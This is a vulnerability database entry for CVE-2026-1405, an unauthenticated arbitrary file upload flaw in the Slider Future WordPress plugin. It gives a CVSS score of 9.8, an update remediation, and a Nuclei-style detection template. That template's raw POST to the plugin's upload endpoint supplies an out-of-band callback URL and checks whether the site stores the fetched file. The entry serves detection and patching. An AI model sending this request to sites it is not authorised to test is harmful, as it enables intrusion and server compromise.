/Vulnerability Library

WordPress Slider Future <= 1.0.5 - Unauthenticated Arbitrary File Upload

CVE-2026-1405
Verified

Description

Slider Future WordPress plugin <= 1.0.5 contains an unrestricted file upload vulnerability caused by missing file type validation in 'slider_future_handle_image_upload', letting unauthenticated attackers upload arbitrary files, exploit requires no authentication.

Severity

Critical

CVSS Score

9.8

Exploit Probability

20%

Published Date

March 23, 2026

Template Author

pussycat0x

CVE-2026-1405.yaml
id: CVE-2026-1405

info:
  name: WordPress Slider Future <= 1.0.5 - Unauthenticated Arbitrary File Upload
  author: pussycat0x
  severity: critical
  description: |
    Slider Future WordPress plugin <= 1.0.5 contains an unrestricted file upload vulnerability caused by missing file type validation in 'slider_future_handle_image_upload', letting unauthenticated attackers upload arbitrary files, exploit requires no authentication.
  remediation: |
    Update to a version later than 1.0.5 or the latest available version.
  impact:
    Unauthenticated attackers can upload arbitrary files, potentially leading to remote code execution and full server compromise.
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2026-1405
    epss-score: 0.20498
    epss-percentile: 0.95638
    cwe-id: CWE-434
  tags: cve,cve2026,wordpress,wp-plugin,slider-future,file-upload,rce,oast,vkev

http:
  - raw:
      - |
        POST /wp-json/slider-future/v1/upload-image/ HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"image_url":"http://{{interactsh-url}}"}

    matchers:
      - type: dsl
        dsl:
          - 'contains(interactsh_protocol, "http") || contains(interactsh_protocol, "dns")'
          - 'status_code == 200'
          - 'contains(content_type,"application/json")'
          - 'contains_all(body,"url","wp-content")'
        condition: and
# digest: 4a0a004730450221009a67d50b984ebafc9e27cc638d46a93737d8a14e4e195fa719b58650189c04a902201fb468b7bbe8c3ca3c21fbb776174e033de27101e677a4a66a1e60e2b3950858:922c64590222798bb761d5b6d8e72950
9.8Score

CVSS Metrics

CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CVE ID:
cve-2026-1405
CWE ID:
cwe-434

References

Remediation Steps

Update to a version later than 1.0.5 or the latest available version.